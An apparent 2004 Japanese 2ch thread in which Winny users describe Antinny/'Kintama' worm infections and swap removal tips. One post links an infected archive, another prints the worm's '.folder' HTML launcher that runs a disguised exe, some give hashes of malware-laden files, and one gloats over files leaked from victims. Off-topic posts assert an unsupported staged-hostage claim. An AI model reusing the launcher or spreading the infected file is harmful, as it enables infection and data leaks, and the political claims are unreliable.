個人で使用している分には何の問題も無いと思うが…。
ハッキリいって壁紙なんて使っている奴の気が知れないけれど。

355 :[名無し]さん(bin+cue).rar:04/04/10 00:14 ID:f8hNpRNP
ぼ、ぼくのかべがみは
は、はじるすのさおりちゃんなんだな〜
も、萌え〜

356 :[名無し]さん(bin+cue).rar:04/04/10 00:19 ID:qMjOS8FT
そういえば、壁紙をグロ画像に変えるウィルスって無かったっけ?

357 :[名無し]さん(bin+cue).rar:04/04/10 00:21 ID:qMjOS8FT
>>355 大きな画像を使えば使うほど負荷が掛かるYO
気持ちは胸にしまって置いた方が快適だと思う。
ところで、はじるすのなおりってキャラはアニメ?

358 :[名無し]さん(bin+cue).rar:04/04/10 00:22 ID:qMjOS8FT
はじるすのさおり、の間違いか。
つか、どこまでが苗字でどこまでが名前なのか分りにくい名前だな。

359 :[名無し]さん(bin+cue).rar:04/04/10 00:26 ID:f8hNpRNP
ttp://zero.product.co.jp/products/rusuban/
さ、さおりちゃんて
こ、この娘なんだな〜



ってもうネタはいいでつよね?

360 :[名無し]さん(bin+cue).rar:04/04/10 00:35 ID:Fr58I3UN
【ロリコン】小学生の妹に手を出した高校生兄タイーホ part5【撲滅】
http://news10.2ch.net/test/read.cgi/news7/1077884705/
( ゚Д゚)・・・・・


361 :[名無し]さん(bin+cue).rar:04/04/10 00:38 ID:qMjOS8FT
>>359 キモイ

362 :[名無し]さん(bin+cue).rar:04/04/10 00:56 ID:vawc9S2F
>>351
WORM_AGOBOT.HHならバスターのバグだよ。

ttp://pc3.2ch.net/test/read.cgi/sec/1080908533
ttp://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=8908

もしかしてホントに知らんのか?

363 :[名無し]さん(bin+cue).rar:04/04/10 01:04 ID:FBg66Qt7
http://tmp2.2ch.net/test/read.cgi/download/1081252043/l50
ここから誘導されてきますた
以下コピペ

ny関係の質問スレがここ以外検索しても見つからないのであえてここに書きますね
さっき何か気でも狂ったのかEXEファイル実行しちゃったんですよ
そしたらそのアプリ自分のコピーを次々にzipファイルにコピーしていくんですよ
ttp://up.isp.2ch.net/up/46b9143428a7.LZH
これが感染したファイル
もうすでに数十個のファイルにコピー製作されてしまいました
内部にあるメモ帳のような形のEXEと***.folderなるファイル
裏で稼動してるsvchostなるアプリケーションを強制終了させるとコピー製作は無くなりました
PCのOSはMEです。
どうか対処法教えてもらえないでしょうか。
なお私が上げたファイルを開くのは自己責任で
 
一通りスレには目を通したんですがどのウイルスなのかわかりません.........
これってシステムに重大な影響とか及ぼすのでしょうか?

364 :[名無し]さん(bin+cue).rar:04/04/10 01:06 ID:OeWS/Ys/
>>363
ウイルスの感染したファイルをアプロダにUPすると逮捕されますよ。


365 :363:04/04/10 01:07 ID:FBg66Qt7
とりあえずUPフォルダは別ドライブなので大丈夫だと思われるのですが.......

366 :[名無し]さん(bin+cue).rar:04/04/10 01:09 ID:FBg66Qt7
勘違いゴメソ
今すぐ消してきます
・・・・・・
削除キー無い・・・・・・・・


367 :[名無し]さん(bin+cue).rar:04/04/10 01:10 ID:OeWS/Ys/
>>365
ttp://up.isp.2ch.net/up/46b9143428a7.LZH
こうやって↑ウイルスをネットにばら撒いていると言ってるんじゃボケ

368 :[名無し]さん(bin+cue).rar:04/04/10 01:11 ID:qLeLo2lz
802 名前:Bitスレ901[sage] 投稿日:04/04/04 19:02
BitDefender(以下BD)が全てのウイルスを検出したわけではないです。
BDが検出したウイルス数の580を100%として出した結果です。
要するにAVGだとBDの37%ということです。

誤解してる人がいるかもしれないので念のため。

※AVGの検出は悪すぎたので"3回再インスト&4回検査”してます。
 で、結果は全て同じ(゚д゚)

非圧縮時の検出率を知りたい人は適当にウイルス集めて試してください(´・ω・`)

【フリー】AVG Anti-Virus Version15
http://pc3.2ch.net/test/read.cgi/sec/1079833302/802

369 :老氏:04/04/10 01:36 ID:ZF3bfsP5
>>362
バグだとは全然知りませんでした。私のバスターでも修正は出来ているらしい
んですけどnyのキャッシュが消えてしまうのは直らないんでしょうか?またバ
スターを入れなおすたびにバグが生じるのは仕様ですか?

370 :363:04/04/10 02:12 ID:FBg66Qt7
ウイルスばら撒いてしまった>>363です
>>74のウイルスがそうであると思い
試しにレジストリキーを消そうと試みたのですが>>74に該当するキーが見当たりません
これは新種なのですか?

371 :[名無し]さん(bin+cue).rar:04/04/10 02:16 ID:gtO0DYEr
もせのZIPに
「ジャケット.txt               .exe」
っていうファイルが入っていたのですが、はウイルスでしょうか?
サイズは1,326,080バイト。

372 :[名無し]さん(bin+cue).rar:04/04/10 02:16 ID:CWwzHhf0
極窓にぶち込めよ

373 :363:04/04/10 02:18 ID:FBg66Qt7
>>371
それが奇しくも俺が感染したウイルスです

374 :371:04/04/10 02:18 ID:gtO0DYEr
>>74の情報にピッタリ合致しました(´・ω・`)
駆除してきます・・・なんでexe実行しちゃったんだろう。

375 :363:04/04/10 02:20 ID:FBg66Qt7
>>371
そのZIPの中に(適当な名前).folderってファイルなかった?

376 :371:04/04/10 02:21 ID:gtO0DYEr
>>375
あった。これを開こうとしたのかも。実行したときに何もエラーでなかったんで。
どうやって駆除したらいいんでしょ。

377 :[名無し]さん(bin+cue).rar:04/04/10 02:23 ID:FBg66Qt7
じゃぁまったく同じウイルスか>>74のやり方で出来るといいんだけど
俺のPCじゃなぜかレジストリ内にsvchostが無い(´・ω・`)
どんづまり_no

378 :[名無し]さん(bin+cue).rar:04/04/10 02:25 ID:OZOQkp3E
キンタマ感染して血飛沫見れた。
ちょっと感動した。
ていうかマジでちょっとこえーわw

379 :[名無し]さん(bin+cue).rar:04/04/10 02:26 ID:FBg66Qt7
ちょっと再起動してみよ.........

380 :371:04/04/10 02:27 ID:gtO0DYEr
消すべきレジストリキーが不明。ノートンがファイルを勝手に消してくれたみたい。反応無かったのに。

381 :[名無し]さん(bin+cue).rar:04/04/10 02:31 ID:FBg66Qt7
んー忌々しいSVCHOSTが動いてない('∀`)
直ったのかな?
これから数十個のファイルからウイルスの卵を除去しなきゃ_no

382 :[名無し]さん(bin+cue).rar:04/04/10 02:33 ID:EJp7b4VB
漏れ、クリンインストール後のアップデート中にウイルスアラート
でた。このあいだ。

パッチ適合前のセキュリティホールを狙われたんだと思うことにした。
その後はなんにもありまっしぇん

383 :371:04/04/10 02:41 ID:gtO0DYEr
>>381
どのファイルを消せばいいの?
10コもあるんですか?

384 :363:04/04/10 02:43 ID:FBg66Qt7
追加情報
ZIPに産卵されたウイルス本体を除去中にウイルスのアイコンがテキスト型からフォルダ型に変更なる場合がありました
(適当な名前).folderは存在しない場合もあります

385 :[名無し]さん(bin+cue).rar:04/04/10 02:44 ID:FBg66Qt7
>>371
俺はWinnyのダウンフォルダのファイル80個近くに卵産み付けられた
アップフォルダの場合もあるようなので注意

386 :[名無し]さん(bin+cue).rar:04/04/10 02:45 ID:VBZNRZQU
漏れは例の ファイル名    .exe にだまされて実行してしまった。

気づいたのは使用者名がシステムのプロパティの使用者名が
”Winnyで違法ファイル集めてます(^^)v”に変わっていることだった。

駆除しなければと思い、ノートン先生(キンタマウィルス適応済み)AVG、
スキャンディスク、スパイウェアと、思い当たる節すべてやったが効果なし。

msconfigからスタートアップ項目の見直しもやったが起動の度にキンタマ発動。
regedit起動不可能。

ここまでは普通だろうな。

387 :[名無し]さん(bin+cue).rar:04/04/10 02:46 ID:FBg66Qt7
ちなみに俺はノートンやらバスター、マカフィーその他対ウイルスソフト何て入れてません
だから悪化したんだよ俺_no

388 :[名無し]さん(bin+cue).rar:04/04/10 02:50 ID:FBg66Qt7
とりあえず完全に除去完了ぽ

389 :[名無し]さん(bin+cue).rar:04/04/10 02:51 ID:EJp7b4VB
>>386

OSは?
漏れW2Kだが、が感染したらしい時に再起動かけたら
ログインできなかった。使用者名書き換えられていたのか・・・。


390 :[名無し]さん(bin+cue).rar:04/04/10 02:55 ID:EJp7b4VB
>>385
>俺はWinnyのダウンフォルダのファイル80個近くに卵産み付けられた

既存のファイルを改変されたってこと?そんなこともするの?

391 :[名無し]さん(bin+cue).rar:04/04/10 03:01 ID:gtO0DYEr
>>388
完全除去の方法教えてくだされ。
とりあえず、タスクマネージャーで、見慣れないms****.exeを強制終了して
system32内部にある同名ファイルを削除した。これが子だね?
あと>>74に書いてあったファイルバージョンとかの親もみつけて削除した。
あとhosts ファイルも不要な行を全部消去した。
レジストリの値は残念ながら見つけることが出来なかったけど。

これだけでは不十分?

392 :386:04/04/10 03:04 ID:VBZNRZQU
>>389 WinXP SP1でつ

>>386の続き

んで腹立ったから要はny起動しなきゃいいんだと自分を落ち着かせ
のーとん先生がしっかり対応するのを待とうと思った。

そのころから、マイミュージック内のファイルがキンタマウィルスに変わっていた。
ファイルの種類が「メディアファイル」、アイコンがWMPのアイコン、
ファイル名.mp3     .exe のあれだ。

しかし、漏れのPCの本当のmp3アイコンはWinampのマーク。
スペースと.exeを消せばなんとかmp3を再生できるので安心していた。

それから2週間後だったかな。マイドキュメントのファイルがすべて消えたよ。

393 :[名無し]さん(bin+cue).rar:04/04/10 03:09 ID:IPty86Es
>392
>のーとん先生がしっかり対応するのを待とうと思った
その時点でダメ 根本的に考えが間違ってる
亜種が次々出てるくるので100%対応なんて無理
ウイルス対策ソフトはあくまで補助、頼り切ってたらまた感染する

394 :386:04/04/10 03:17 ID:VBZNRZQU
>>386>>392の続き

長レスごめんね。これラスト

まぁnyやってる漏れも悪かったが、それで>>74のなにやってんのかは不明
なんて謎が解けたじゃねえかよ。

↓さーおまいら漏れをたたきのめせ!!

395 :[名無し]さん(bin+cue).rar:04/04/10 03:18 ID:X8FA9vkq
         .__
       .-'~;;;;;;;;;;;;;;~'-、
    /~;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,ヽ、
   ,;';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;ヽ、   18歳。
  ./;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;ヘ   去年まで工房だったけど、劣化ウラン弾報道と自演拘束で
  l;;;;;;;;;'   ~''''''''''~    ';;;;;;;;l  小泉にダメージ与えた。一度やってみなよ。
  .l;;;;;;;;;;            ;;;;;;;l  初回のみだけど、10行以上の「声」を投書すれば30ドル(4000円くらい)貰える。
  l;;;;;;;;;;' __     __. ;;;;;;l  行くだけ行って適当に反米報道することもできるし、自演で武装集団に
  k;;;;;;;'     ~''   ~     ;;;;;l  思い切って拘束されてしまえば50パーセントで自衛隊撤退派が二倍になる。
 ヘ ヽ;;  -=・=-   -=・=- ;; ノ  金なきゃ帰国してから拘束体験で本書けばいいだけ。暇つぶしになる。
  ヽ_l      /      '-'   反米とか反戦とか色々あるのでマジでお勧め。
   ∧.    k'  ヽ    l
  / キ     ゚_゚´   /ヽ、   
 ./   ヽ 、  ''''==''' /  キ
_,/    ヽヽ、_    /    ト-
       `'''-=='''     ノ

396 :[名無し]さん(bin+cue).rar:04/04/10 03:19 ID:87YdMtmO
           、、、、
            | | | |          _ /| l -、 、_
           _|_|_|_|        /| |: : | | : | | : :| |: : (
          〈〈〈〈 ヽ     /: : :.| | : :| |:;:;| |: ; | |: : ::ゝ  
          〈⊃  }     {:: : :.| | ノ| | | |--| |\: ::}  
   ∩___∩  |   |      {:: : :| |ノ | |/.| |ェェ| | ヾ: :::}
   | ノ      ヽ !   !   、  l: ノ| | /| |= | |-、| | |: ::ノ
  /  ●   ● |  /   ,,・_  | | |/ | | | | ̄| | /::ノ
  |    ( _●_)  ミ/ , ’∴ ・ ¨  >| |(_.| |-.| |┘| |/
 彡、   |∪|  /  、・∵ ’  /、 | |/|.| | | | ̄| |ヽ
/ __  ヽノ /         /  .| |./ | | | |/| |\ 〉
(___)   /               >394

397 :[名無し]さん(bin+cue).rar:04/04/10 03:19 ID:5buJJQDZ
自動実行の設定を確認したいかったらmsconfigよりこれ使った方がいいかも。
ここは他にも役に立つツールがいっぱいあるよ。
ttp://www.sysinternals.com/ntw2k/freeware/autoruns.shtml

398 :[名無し]さん(bin+cue).rar:04/04/10 04:37 ID:0K4VApCL
>>397
おーこれわかりやすくていいね。
サンクス!使いまし。

399 :[名無し]さん(bin+cue).rar:04/04/10 10:06 ID:lW0X1sZw
どなたかAntinny.ms(仮)に関する詳しい情報を教えて下さい。


400 :[名無し]さん(bin+cue).rar:04/04/10 10:21 ID:XSpR4oiC
今の所脳豚先生が一番これなしでnyやってるとストレス溜まるゾ

401 :[名無し]さん(bin+cue).rar:04/04/10 11:32 ID:DF3q0ewn
>>394
人柱乙y

402 :[名無し]さん(bin+cue).rar:04/04/10 12:08 ID:kpD69vEv
今出回ってる亜種ってnyやらなければ大丈夫なんでしょ?
だったらnyやめるべし。それが一番イイ!!

403 :[名無し]さん(bin+cue).rar:04/04/10 12:17 ID:5HckT0Nf
>>394
それ74のとは違うよ。
使用者名が変わるのはキンタマ騒動以前からあったし。

404 :[名無し]さん(bin+cue).rar:04/04/10 12:29 ID:MKHV9H65
Antinny.Aの........................exeを削除したら
.Vexeっていうのが残るんだけど、これなに?

405 :[名無し]さん(bin+cue).rar:04/04/10 12:33 ID:aV8S9Z7m

ミスチルのアルバム欲しい

でもお金ない

親のパソで黙って、友達から聞いたnyってのをやる

シフクノオトgetラッキー

案の定、金に感染

悲鳴やら首チョンでてきて(/≧◇≦\)アチャー

親知らずに、重要な仕事のファイルが流出&ゴミファイル化

親会社解雇

家庭崩壊
 
実際に中学生とかありえるんじゃないか?。
UGの入り口がnyってのは、ある意味不幸なのかもしれないな。

406 :[名無し]さん(bin+cue).rar:04/04/10 12:47 ID:GveJgSMq
XPで別アカウントとってログインしたPCって仮想PCと同じ役割果たしてくれたりしますか?
別アカウントでHDDあぼん食らっても、もう一つのアカウントはHDD無問題?

407 :[名無し]さん(bin+cue).rar:04/04/10 13:02 ID:1043UjvP
>406
そんなわけあるか。
食らったら最後、HDDは全滅じゃ。
今のとこ、LAN接続のマシンにまでは悪さしないようだが、これも時間の問題
さっさとフォーマットしる

408 :[名無し]さん(bin+cue).rar:04/04/10 13:04 ID:Gd9fWUif
何踏んでウイルスかかったか書いてよ

409 :[名無し]さん(bin+cue).rar:04/04/10 13:10 ID:GveJgSMq
別に自分はウィルス踏んだわけじゃないけど
.exeとかは本PCで踏めないし、
VM wareとかVirtual PC買うしかないみたい....高かったらどうしよう
XP  CPU/ぺん4 2.60GHz メモリ1.00GB
くらいあったらいけるかなぁ。使うのって難しいのん?

410 :[名無し]さん(bin+cue).rar :04/04/10 13:26 ID:FJLGorXb
登録日 安全性 ファイル名 ハッシュ ジャンル Ver. ひとこと
04/02/28 12:10 危険 (18禁ゲーム) [040227][cage] 大好きな先生にHなおねだりしちゃうおませなボクの/私の××××(ぷにぷに) (ccd+rr4).rar 167fe419dd24872212d9ef9adf6f0a4c ギャルゲー 5 これもHDD 消去ウイルス入り

これ踏んじゃったよハハハ

411 :[名無し]さん(bin+cue).rar:04/04/10 13:30 ID:1E8x8Zed
たぶんms踏んだと思います
今やっと>>74を見て、サイズも一緒だしノートンが止まってたから、コレだったのか!ってわかりました
その時の対処はすぐタスク表示させて、実行ファイルを止めたんだけど、、
msは動いてたのかも……

ぬるぽときんたまを確認して安心してしまった、、が
いちおCドライブリカバリ
これでノートンも復活(期限も増えてウマー)

と対処しましたが、これで大丈夫ですかね?

412 :[名無し]さん(bin+cue).rar:04/04/10 13:47 ID:pqK3lWyy
>>410
これ確かAutorun切ってない云々の奴だよな。
初心者を呼び寄せやすいファイル名なのか、いつまでも感染者が後を絶たないなw

413 :[名無し]さん(bin+cue).rar :04/04/10 14:03 ID:FJLGorXb
まぁbugを削除しちゃえば問題ないんだけどね

414 :[名無し]さん(bin+cue).rar :04/04/10 14:04 ID:FJLGorXb
>>412
>>413

415 :[名無し]さん(bin+cue).rar:04/04/10 14:32 ID:pqK3lWyy
>>413
君がそう納得してるのならもう何も言うまい

416 :[名無し]さん(bin+cue).rar:04/04/10 14:34 ID:MS2MenCH
>>415
ええ!やっぱまだまずい?

417 :[名無し]さん(bin+cue).rar:04/04/10 14:39 ID:eZiR0+1F
『名前.jpg .exe』とかってアイコンがjpgじゃなくてexeのやつになってるよな
なんで踏むのかね…

418 :[名無し]さん(bin+cue).rar:04/04/10 14:46 ID:gdeKjyyy
>417
どんなファイルでも踏むやつは踏む。

419 :[名無し]さん(bin+cue).rar :04/04/10 14:52 ID:MS2MenCH
>>417
拡張子表示してないんじゃない?

420 :[名無し]さん(bin+cue).rar :04/04/10 14:59 ID:MS2MenCH
>>410
なんかこれ>>410 ググって調べてみたら感染力はないみたいなことなってるけど
ほんとにHDD壊れんのかな?自分のは2日経つけど全然問題ないんだが

421 :[名無し]さん(bin+cue).rar:04/04/10 15:05 ID:aX2P63+p
>>412
それ以前にウィルスが蔓延してる状況で Administrator 権限でログイン
してる初心者が多い。狂気の沙汰。せめて Power Users 権限にしる。
Adminnistrator 以外なら regedit や hosts も変更されない。

UpFolder.txt などの上書きされそうなファイルはすべてウィルスに
書き換えられないようにアクセス権設定する。

Administrator でないと動かないセキュリティソフトなはサービスで
起動するか RUNASA などの Administrator で起動できる補助ソフト使う。

無論これで完璧などということはないが、適切なユーザでログイン
するのはアンチウィルスソフトやファイアウォールを入れる以前の問題。

422 :Adminnistrato?:04/04/10 15:34 ID:aX88Ux2r



  ('A`)      マンドクセ    
  ノ( ヘヘ

423 :[名無し]さん(bin+cue).rar:04/04/10 15:37 ID:VyN4tMqc
レジストリいじって.folderを無効にする方法ってあったよね?
やり方キボンヌ。

424 :423:04/04/10 15:41 ID:VyN4tMqc
自己解決したわ、スマソ

425 :[名無し]さん(bin+cue).rar:04/04/10 16:29 ID:nIoMrxpV
HKEY_CLASSES_ROOT\.Folderを削除するんだっけ?

426 :[名無し]さん(bin+cue).rar:04/04/10 17:33 ID:ISirrqlO
>>421
>UpFolder.txt などの上書きされそうなファイルはすべてウィルスに
>書き換えられないようにアクセス権設定する。

確かキンタマには効果なしという話だったよね…?

427 :[名無し]さん(bin+cue).rar:04/04/10 17:36 ID:eZMpG2al
>>426
アクセス権を設定するんだよ?

428 :[名無し]さん(bin+cue).rar:04/04/10 17:37 ID:n3CpSiEJ
>>426
Administrator でログインしてたらそりゃだめだ。

429 :[名無し]さん(bin+cue).rar:04/04/10 17:46 ID:1043UjvP
>436
当然、NTFSにしてね

430 :[名無し]さん(bin+cue).rar:04/04/10 18:00 ID:k6jwaaeM
>>436
当然、NTFSにするように。

431 :[名無し]さん(bin+cue).rar:04/04/10 18:04 ID:KX2kCzBf
>>429
436はNTF以外ありえない!
そんなのわかりきったこと何年も前から言われてるだろ!

432 :[名無し]さん(bin+cue).rar:04/04/10 18:08 ID:5BOwPfzv
>>436
だよな、当然NTFSだよな

433 :[名無し]さん(bin+cue).rar:04/04/10 18:48 ID:QINxMLuo
空気読めなくて悪いんだけど、

(グロ)狂ったネコが人間を襲います。心臓の弱い方は見ないで下さい!(1m39s)
映画アニメdvdコミックemurom一般ゲームアプリ無修正エロ同人誌gbaps2avivお宝.wmv
,,0,0,459e1415b4ad11870aa4bd0c452b894f,0,1,1

これは一体何ですか?
明らかに怪しいんだけど、気になって落としてみたら変換後にリストから消えてDownフォルダにも残ってない。
でもキャッシュには100%で完了してる。で、キャッシュ消したらtxtアイコンが変わりました。
ウイルススキャンしても特に何もないし、システムの復元でちょい前に戻したんだけど、何か分かる人教えてください。
OSはMeです。

434 :[名無し]さん(bin+cue).rar:04/04/10 18:49 ID:506D1KsM
>>433
自業自得



435 :[名無し]さん(bin+cue).rar:04/04/10 18:50 ID:LCz7uP0m
だな

436 :[名無し]さん(bin+cue).rar:04/04/10 18:52 ID:KXlpyHEk
もちろん、NTFSだ。

437 :[名無し]さん(bin+cue).rar:04/04/10 18:52 ID:QINxMLuo
>>434-435
これもキンタマの類なの?

438 :[名無し]さん(bin+cue).rar:04/04/10 18:55 ID:T+ykyaZG
感染した人ってみんなACCSに情報送られてるん?
それだったらやばくない?

439 :[名無し]さん(bin+cue).rar:04/04/10 18:55 ID:nb1Jf1gQ
>>436
グッジョブ(w

>>437
再インスコでもすれば?

440 :[名無し]さん(bin+cue).rar:04/04/10 18:57 ID:506D1KsM
>>438
ここらあたり嫁
http://www.geocities.jp/kim_virus/
http://myui.s53.xrea.com/kin/index.html
http://chiakis-web.hp.infoseek.co.jp/kintama-v/


怪しいファイルはダウンロードしない

 こ れ 常 識

441 :433:04/04/10 19:04 ID:QINxMLuo
>>439
分かりました。再インスコします。
その前に何のウイルスかだけ教えてくれたもう。

442 :[名無し]さん(bin+cue).rar:04/04/10 19:06 ID:T+ykyaZG
>>440
でも、このスレにけっこう感染者いるよね?


443 :[名無し]さん(bin+cue).rar:04/04/10 19:12 ID:CCHwW3Nn
「お前、違法なモノ落としているだろ!」
というメッセージが出るウィルス(ノートン先生発見出来ず)は既出?

444 :433:04/04/10 19:18 ID:QINxMLuo
教えてくれないのか、分からないのか?
まぁいいわ、インスコし直します。

445 :[名無し]さん(bin+cue).rar:04/04/10 19:25 ID:CCHwW3Nn
>>433 WMV形式のウィルスってのは、まだ確認されていない。
そもそも可能かどうかも怪しい。気のせいか、あるいは別の要因が問題だろう。

446 :433:04/04/10 19:38 ID:QINxMLuo
>>445
今のところ害もないし、やっぱ再インスコ止めます。
レス、サンクスコ!!

447 :[名無し]さん(bin+cue).rar:04/04/10 19:41 ID:T64csZvE
>>446
もう試したかもしれないけど、そのファイル名の一部を
検索にかけてHDD内にないか確かめてみてはどうか?

448 :[名無し]さん(bin+cue).rar:04/04/10 19:43 ID:yAxQ3C1F
サブのPCで>>363試してみた
>>363のウイルスらしきものはフォルダをスキャン、.folderをダブクリしてもノートン先生は無反応(NAV2004)
感染したあとCドライブをスキャンしたら親と子はTrojan Horseとして見つけてくれた。
サイズも>>74と一致

mscpxl.exe  Trojan Horse  282kb
mspmsppsv32.exe  Trojan Horse  242kb

後の処理は自分でやらないといけないみたい
>>380
>>381

レジストリキーが不明つーの今の所一緒(汗
もうちょっと放置して様子をみてみるかな?

449 :[名無し]さん(bin+cue).rar:04/04/10 19:59 ID:VasW/VLC
HDD全部削除するヤツってその後も起動する度に削除するよう
レジストリに登録されたりするの?

450 :[名無し]さん(bin+cue).rar:04/04/10 20:04 ID:T64csZvE
>>449
HDDフォーマットはウィルスじゃないよ。

でも、そういうウィルスないとも言い切れないから
心配なら再インスコ(どっちみちHDDフォーマットされたなら、やって失うものなし)

451 :[名無し]さん(bin+cue).rar:04/04/10 20:15 ID:fOo/95Y1
>>449
ファイル名くれれば落としてどういうウィルスか確認してもいいがな

452 :[名無し]さん(bin+cue).rar:04/04/10 20:24 ID:3JNwE8zq
>>449
とりあえず、HDDを全部削除されたら起動できないんじゃないか?と。

453 :[名無し]さん(bin+cue).rar:04/04/10 20:24 ID:1043UjvP
ウイルスとワームとjoke-softの区別はつけような。
ま、最近のは複合化してるが、それにしても踏むやつ多杉
踏んで晒して気づかないやつも多杉

454 :[名無し]さん(bin+cue).rar:04/04/10 20:28 ID:GfxQufWM
ウィニーで流行ってるウイルスって
ウイルスバスターで防げないの?

455 :[名無し]さん(bin+cue).rar:04/04/10 20:33 ID:VyN4tMqc
  ┏┳┳┓              ┏┳┳┓
┏┫┃┃┃ 厨房・無知は. ┃┃┃┣┓
┃┃┃┃┣┓ ここまで   ┏┫┃┃┃┃
┃      ┃┃┏━━━┓┃┃      ┃
┃ 調べる. ┣┫ ・∀・ ┣┫  努力を┃
┗━━━━┛┗┳━┳┛┗━━━━┛
            ┏┻┓┃
        ┏━┛  ┣┻┓
        ┗━━━┫  ┗━┓
                ┗━━━┛

456 :[名無し]さん(bin+cue).rar:04/04/10 20:44 ID:XCBv0vUB
ここって常に最新情報がわかるからいいよね

457 :[名無し]さん(bin+cue).rar:04/04/10 21:00 ID:T64csZvE
>>454
前スレとか読むのが面倒な上に初心者は
ネットランナーっていう雑誌を読むといいよ。

これはバカにしてるんじゃなく、マジで君の知りたいことが載ってます。
(5月号880YEN)

458 :[名無し]さん(bin+cue).rar:04/04/10 21:19 ID:Sx0+LljD
>>457
ハッシュきぼん

459 :[名無し]さん(bin+cue).rar:04/04/10 21:58 ID:MKHV9H65
\_Restore にウィルスが見つかった場合、いちいち復元ポイント破棄して削除すべきかな?


460 :[名無し]さん(bin+cue).rar:04/04/10 22:05 ID:NcdnLnKX
3月中旬に感染したんだが今日やっとバスターが検出してくれたよ
WORM_ANTINNY.Dだって

461 :[名無し]さん(bin+cue).rar:04/04/10 23:04 ID:CCHwW3Nn
[18禁ゲーム] スク×スク (Disc1).rar 683,534,031
c3485bd78df964937e103910a26e905c

これに入っているウィルスというか破壊工作プログラム面白い。
ジョークソフトもここまでやるのかって感じ。

462 :[名無し]さん(bin+cue).rar:04/04/10 23:05 ID:CCHwW3Nn
メッセージの一例→「これもお前のためだ。耐えるんだ!」

ワラタ

463 :[名無し]さん(bin+cue).rar:04/04/10 23:15 ID:Gqp+m3nw
先日、もせtitle exeを踏んでしまったんですが
それ以来PC立ち上げてny起動するたびにデスクトップ上に
Up Folder.txtが出来ます。内容はBBS [Pass]=
です。  で、いったんtxtを削除し、nyを終了して
再び立ち上げるとtxtは出来ません。しかしPC再起動してnyを立ち上げると
やっぱりUp folder.txtが出来ます。それ以外は今のところ不具合はありません。
今流行のキンタマなんでしょうか。

464 :[名無し]さん(bin+cue).rar:04/04/10 23:18 ID:V1BYbbl/
ログ嫁や

465 :[名無し]さん(bin+cue).rar:04/04/10 23:22 ID:QtMkVs09
>>448
レジキーに
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Win32DistributedClient
ってある?


466 :[名無し]さん(bin+cue).rar:04/04/11 00:17 ID:yfWT8Mok
圧縮ファイルを解凍した中にあったindex.folderというものを実行してしまいました。
で、焦って色々と調べたのですが、解凍したフォルダ内に.exeがなければ大丈夫ですよね?
メモ帳でその.folderを開いてみたら
<html><head><title></title>
<object CLASSID='CLSID:00000000-0000-0000-0000-FFF085324649' CODEBASE='Index(2)/ジャケット写真.exe'></object>
<script>window.location = "./";</script>
</head><body></body></html>
とありましたが、ジャケット写真.exeというファイルは見当たりません。
どなたか安心させて下さい・・・

467 :[名無し]さん(bin+cue).rar:04/04/11 00:52 ID:ED7QxsDa
>>466
(・∀・)コンニチハ!!

468 :[名無し]さん(bin+cue).rar:04/04/11 01:07 ID:yfWT8Mok
>>467
えっと・・・
マジですか・・・?  orz

469 :[名無し]さん(bin+cue).rar:04/04/11 01:09 ID:wQNxyY0G
(・∀・)ダイジョウブ!!
ウイルスを高速で除去るんだ!

470 :[名無し]さん(bin+cue).rar:04/04/11 01:17 ID:yfWT8Mok
>>469
バスターには引っかかりませんでしたし、
ウイルスの種類もわかりませぬ・・・
スレの最初のほうに書いてあるキンタマの感染確認もしましたが
どれも引っかかってないんですよ・・・
どうすれば良いんでしょうか・・・・orz

471 :[名無し]さん(bin+cue).rar:04/04/11 01:19 ID:wQNxyY0G
ノートンオンラインスキャンを試してごらん
ダメならとことん再インストまで

472 :[名無し]さん(bin+cue).rar:04/04/11 01:19 ID:ED7QxsDa
>>466
マジレスするとその圧縮ファイルの中にもともとexeがなかったんなら大丈夫だよ。
圧縮ファイルの中にあったら・・・ヤヴァイね。

473 :[名無し]さん(bin+cue).rar:04/04/11 01:19 ID:CSJ0OTAK
>>470
まず簡単なのが、質問する板を変えることだ


474 :[名無し]さん(bin+cue).rar:04/04/11 01:27 ID:gUxMUgwm
>>465
漏れできたことあるなぁ(´・ω・`)
前スレらへんで助けられたけど、なぜあれは反応しなかったんだろう?

475 :[名無し]さん(bin+cue).rar:04/04/11 01:29 ID:yfWT8Mok
>>472
ってことは大丈夫ですね。
ありがとうございます。


476 :[名無し]さん(bin+cue).rar:04/04/11 01:31 ID:wQNxyY0G
隠しファイルの表示をしてないとか逝ったら怒るよー

477 :[名無し]さん(bin+cue).rar:04/04/11 01:35 ID:yfWT8Mok
>>476
それは大丈夫です。
心配かけました。

478 :[名無し]さん(bin+cue).rar:04/04/11 02:07 ID:S9JTtR1D
厨房たちが沢山感染してくれるからオモロイ厨房スクショやその他のファイルがDLできます。
もうこれだけでネタサイトが構築できるほどに。

http://www.gazo-box.com/wara/img-box/img20040411020408.jpg
これはちょっと鬱になったけどなメッセージに

479 :[名無し]さん(bin+cue).rar:04/04/11 02:26 ID:fqHA3zmk
nyって何?

480 :[名無し]さん(bin+cue).rar:04/04/11 02:28 ID:86iYKKxV
naisyono内緒の
yarashiiやらしい話

481 :[名無し]さん(bin+cue).rar:04/04/11 02:30 ID:kD7vyMZ2
naoの
yarashiiやらしい話

482 :[名無し]さん(bin+cue).rar:04/04/11 02:33 ID:86iYKKxV
naoと
yo-ichiの暴露大会

483 :[名無し]さん(bin+cue).rar:04/04/11 02:47 ID:WBJaYXXN
naoが
yaranaika?


484 :[名無し]さん(bin+cue).rar:04/04/11 04:39 ID:bMWcqXXD
upフォルダができて、そこに勝手にダウンフォルダのコピーを
生産し続けるウイルスに感染した。
パソコンは常の重い状態、書き込みもやっとでかいてる。
これはなんってういるす?

たすけてーーーーーーーーーーーーーーーー



485 :[名無し]さん(bin+cue).rar:04/04/11 04:43 ID:rN444r7e
>>484
ダウンフォルダの中身を他のフォルダに移動させればいいじゃん

486 :[名無し]さん(bin+cue).rar:04/04/11 04:45 ID:bMWcqXXD
そういうトンチ問題じゃねーの。

487 :[名無し]さん(bin+cue).rar:04/04/11 04:52 ID:zLTzeKus
792 :番組の途中ですが名無しです :04/04/11 03:44 ID:2ccbT6PE
結局「自衛隊撤退」させるための大がかりな自作自演だった事が発覚したわけだが
この3日間、たった三人のこの馬鹿共に日本は振り回された。
株の暴落、税金の無駄金。その他いろいろな迷惑を被ったのである。
